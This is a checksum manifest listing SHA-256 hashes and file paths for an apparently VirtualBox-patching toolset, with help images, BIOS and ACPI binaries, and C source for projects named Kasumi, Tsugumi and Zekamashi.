-59396c00655ca710d90ac0b5517e1e0052cc856bc0c3fdaf7daad546bb463004 *Binary\help\7_display.png
-5d075e5eee28ada7c4b0fde691d688a3fed4ce45806b76052c40a2b4085b6237 *Binary\help\8_storage.png
-43b1df292952f586a4d7f602d294e1face5b160ebd7bf20a556ddc9034ad8c8b *Binary\help\9_network.png
-70c5bbb899599d4cce2cc6d64c79f4b8cc999de9fee3c5f56eba2bdccc55f78f *Binary\help\vbox6_efibug_workaround.png
-b5bdf1f98dce80572af00488fe828bd5c614d1b00b1f2c701a9f626366ea5b69 *Binary\linux\ACPI-DSDT.bin
-48dcfde10d68d8cd84eaad6769e487e98e4c31c29aa78ba2dd1a9ab0bc93fbef *Binary\linux\ACPI-SSDT1.bin
-5fa817a7cddff46b6b4ed0d9a5f91d13852a9301638ee358f78b916666b9ae79 *Binary\linux\modifyvm-BIOS
-99e0b783c376bf480cb9afb3002740b78578622faa214a2b4b329dfc61d89282 *Binary\linux\modifyvm-EFI
-7bfa8b960a942d2f5e3c53467cef4a749801d97eb5fc5aa2970c5a7dd8d2b0ec *Binary\linux\pcbios.bin
-4e01f7906ad056ee591920d086102e3e2e928f1168a2b15a56538925cdd370b3 *Binary\linux\pxerom.bin
-8b492986d7cbb8602eb148514c9b3abd632e6b520104de8deed38fc839fedd0f *Binary\linux\readme.txt
-96db5da69d9d7dc09dc82fb50c10f6101e632fb99c06ee4e18a8c6ad2100eb6c *Binary\linux\splash.bmp
-251022747726ca0c1cbbb1eb65bc874e6a470ca270f5e8b494533f7d1bffd13a *Binary\linux\videorom.bin
-0eabd6f275e158b6bfa1019848e8ad0edfc03f82001599914a158675fe0e86cd *Binary\patchgen\Kasumi.exe
-1cf445df8841e6bb9e0696f860f120ac08b30b022a849483c2692b5fd9301f08 *Source\CodeSigning.txt
-4cb099039e05156dd8e1266dfa491d9fdd472cc28382a4197db2c04d1e11dc4e *Source\Kasumi\VBoxPatchGen.sln
-27b89ba25c1620f7f46af4a239d6a18b71b9b689ea33eb7ab099e0b039cdf21f *Source\Kasumi\VBoxPatchGen\cui.c
-3058dea6894b1ca7bcff8896b35080c0ddfa1c541e7e505792cbac65dea9d0d9 *Source\Kasumi\VBoxPatchGen\cui.h
-61983dec1f453a78ece9eee71ff08194160cb150e64eab9984c7fff9126cee3a *Source\Kasumi\VBoxPatchGen\global.h
-109a7da0ce8f3c2f85b5b871af55193a4481b880a7cf20f85832db919629900a *Source\Kasumi\VBoxPatchGen\main.c
-d0debd4f7db2ef941f0b02e9d7d1b85d873f0a01dcb4537b5e112c68443aaaa6 *Source\Kasumi\VBoxPatchGen\ntos.h
-4785710be128dfd3f4e386f584ddada562fafa1903491c4d53c8a5f12b681701 *Source\Kasumi\VBoxPatchGen\patterns.h
-73adf98a7a275942811192166eca735dd785771cc29b29869f8a3e57b2f61f88 *Source\Kasumi\VBoxPatchGen\resource.h
-fe101af97c2004eacf5fd8e84e8de0d1e283cbb225dd5da8b7260beb3a6be75e *Source\Kasumi\VBoxPatchGen\Resource.rc
-5c2737bdb6e170fe2b77a7422553a9b2f30bb940f69535c73bec64d1f482102d *Source\Kasumi\VBoxPatchGen\VBoxPatchGen.vcxproj
-cd610e84416b63f7414e177e6b8398dd3e5e8787b344616ed53c26c5eb5c8fff *Source\Kasumi\VBoxPatchGen\VBoxPatchGen.vcxproj.filters
-87592b66543f1a83f263441e595e2a6a2dcab193581a5f511ab875d6914bce34 *Source\Kasumi\VBoxPatchGen\VBoxPatchGen.vcxproj.user
-28eae019e74dfd55cb5a86e3fa6cb87779ea70bfa281f6593a809b63858019eb *Source\Kasumi\VBoxPatchGen\minirtl\cmdline.c
-a108a76d0b5113772c20f7329eaeac490dab2f9ce0b7beaeea5fe80bbdb041cf *Source\Kasumi\VBoxPatchGen\minirtl\cmdline.h
-757523eaa1838f873e41bdeea69c839d21aa8a8e0c96c1918121ea86a222267f *Source\Kasumi\VBoxPatchGen\minirtl\minirtl.h
-82bdda67972f1b07b8c486208cf782f2a75e8efab0eb66c089e64f03b35aeb77 *Source\Kasumi\VBoxPatchGen\minirtl\rtltypes.h
-d0c65008262381fd065ba8c364cfa5cf8b471c363bf385e3a468fa53945af918 *Source\Kasumi\VBoxPatchGen\minirtl\ultohex.c
-c902616e5949b38a2700741c775417f9a52270a469864d9ef033664682bdc458 *Source\Kasumi\VBoxPatchGen\minirtl\_strcat.c
-43c13acfea0213bc1651f11f42d55f2830447e149ad6176326ba8226e4c9d3e6 *Source\Kasumi\VBoxPatchGen\minirtl\_strcpy.c
-9fa6411f94c8a3866b887823569337bdb29796056f8cadb89791d84933d6861c *Source\Kasumi\VBoxPatchGen\minirtl\_strend.c
-213f8bc30a76ead3c8a60b61cc46c76a873f06f7c0bb473effeb584a6588a308 *Source\Kasumi\VBoxPatchGen\minirtl\_strlen.c
-45311e7dc901baf0d3e3ef2ddd76863b84eaea45800cbea5672b87f286b57169 *Source\Tsugumi\main.c
-8d6786d0e26b06c9cb1d23e460b173a632fbcc82dc5109f3f1207e9aa888d222 *Source\Tsugumi\main.h
-6b95cd81ca4f309ac9f243ae73d2e8099634aaffead5b7b214bfcd14b6d604f6 *Source\Tsugumi\resource.h
-ceadc27f0df3d8e6282929fd40227713f531a5ddf4f6a171397ab10558cce0fc *Source\Tsugumi\Resource.rc
-68ad6e92cee032d4520f7cbed43d8fd83f723b23ecec8c9205573f54d35d45e6 *Source\Tsugumi\Tsugumi.sln
-969b0d8d22f6d7141693c69de4a3e177f81ce4b00e208b394bf04cd4483d0580 *Source\Tsugumi\Tsugumi.vcxproj
-42c47537b741a1c0da5b0fca62fc78f075db5eb926895391ebdbd9ef7d90c963 *Source\Tsugumi\Tsugumi.vcxproj.filters
-0f519e8924cd229593110649cd62a153550e8cd0acc84966911dcae6ea65f558 *Source\Tsugumi\Tsugumi.vcxproj.user
-cab07b300adda57e34fcec37b6e6918008a2f5281dc965cffff7e5ba68aad676 *Source\Zekamashi\Zekamashi.sln
-27b89ba25c1620f7f46af4a239d6a18b71b9b689ea33eb7ab099e0b039cdf21f *Source\Zekamashi\loader\cui.c
-3058dea6894b1ca7bcff8896b35080c0ddfa1c541e7e505792cbac65dea9d0d9 *Source\Zekamashi\loader\cui.h
-3381a5cf4a0e7817b7c6e99592347d219e13954b01ff1813da5b3d6d27ebd633 *Source\Zekamashi\loader\global.h
-3e1494f39e2bfb576470f7174742a6dae5e34bafb04c902f85c1e50f5295f0da *Source\Zekamashi\loader\instdrv.c
-f6d8ae79a0b7f196618503788ddb665e2302add590aa5815189ce4b375d11a59 *Source\Zekamashi\loader\instdrv.h
-9c461f8c39226e1bdae9ca91e07c88000c8b299f0be4e292f8e974f3bb00d330 *Source\Zekamashi\loader\loader.vcxproj
-d8c8c4cff592311316f51947a8df0818b94b424103b9801f18cd3360bc58f2fd *Source\Zekamashi\loader\loader.vcxproj.filters
-27d6b45180900506501980eee88bbc891c38a428881c4f3a36a18f520063b360 *Source\Zekamashi\loader\loader.vcxproj.user
-7c12321485f246c80fca85b851cbd9d5be684e39023ccc3faff04bfa9709cd80 *Source\Zekamashi\loader\main.c
-d0debd4f7db2ef941f0b02e9d7d1b85d873f0a01dcb4537b5e112c68443aaaa6 *Source\Zekamashi\loader\ntos.h
-df328b27c089423e589264fe5ed1c48c4de258facda4124ba4bc18378bfa04e1 *Source\Zekamashi\loader\oscompat.manifest
-4704f99a4a33ff7346e525891ea6049152b73cf51774a17d00b15e3a4cb95dbd *Source\Zekamashi\loader\patterns.c
-f63ccabb9ba7d04668d1255a263aa2909649eb3d402f5bde6f061a133de24155 *Source\Zekamashi\loader\patterns.h
-73adf98a7a275942811192166eca735dd785771cc29b29869f8a3e57b2f61f88 *Source\Zekamashi\loader\resource.h
-34e5342682909edba6d016019d563cdb2d525eafb0607203529248578af8f3d0 *Source\Zekamashi\loader\Resource.rc
-3ffbabc49a7d0eb44236a16d6a1c15c70b1068ab4084765d594e3b02abf7cdf8 *Source\Zekamashi\loader\sup.c
-0f94b41d2298f294be51ca6219c19c0bbb1eea12d12f86bb5a92fee8d3a1345e *Source\Zekamashi\loader\sup.h
-28eae019e74dfd55cb5a86e3fa6cb87779ea70bfa281f6593a809b63858019eb *Source\Zekamashi\loader\minirtl\cmdline.c
-a108a76d0b5113772c20f7329eaeac490dab2f9ce0b7beaeea5fe80bbdb041cf *Source\Zekamashi\loader\minirtl\cmdline.h
-757523eaa1838f873e41bdeea69c839d21aa8a8e0c96c1918121ea86a222267f *Source\Zekamashi\loader\minirtl\minirtl.h
-82bdda67972f1b07b8c486208cf782f2a75e8efab0eb66c089e64f03b35aeb77 *Source\Zekamashi\loader\minirtl\rtltypes.h
-040c2d4f9bb0d0e719682a1dc4cc06a528d8bb984aaf89e975eded16d7639586 *Source\Zekamashi\loader\minirtl\u64tohex.c
-84d395d7077527cdf4b4bc56c59038174c4cc0772ca6c733553de7ee18f9c045 *Source\Zekamashi\loader\minirtl\u64tostr.c
-d0c65008262381fd065ba8c364cfa5cf8b471c363bf385e3a468fa53945af918 *Source\Zekamashi\loader\minirtl\ultohex.c
-c902616e5949b38a2700741c775417f9a52270a469864d9ef033664682bdc458 *Source\Zekamashi\loader\minirtl\_strcat.c
-1e903e3ac78a19475b485f6408d455f6258ee8f1f3a5d3b2e8b4c972bd32bc00 *Source\Zekamashi\loader\minirtl\_strcmpi.c
-43c13acfea0213bc1651f11f42d55f2830447e149ad6176326ba8226e4c9d3e6 *Source\Zekamashi\loader\minirtl\_strcpy.c
-9fa6411f94c8a3866b887823569337bdb29796056f8cadb89791d84933d6861c *Source\Zekamashi\loader\minirtl\_strend.c
-213f8bc30a76ead3c8a60b61cc46c76a873f06f7c0bb473effeb584a6588a308 *Source\Zekamashi\loader\minirtl\_strlen.c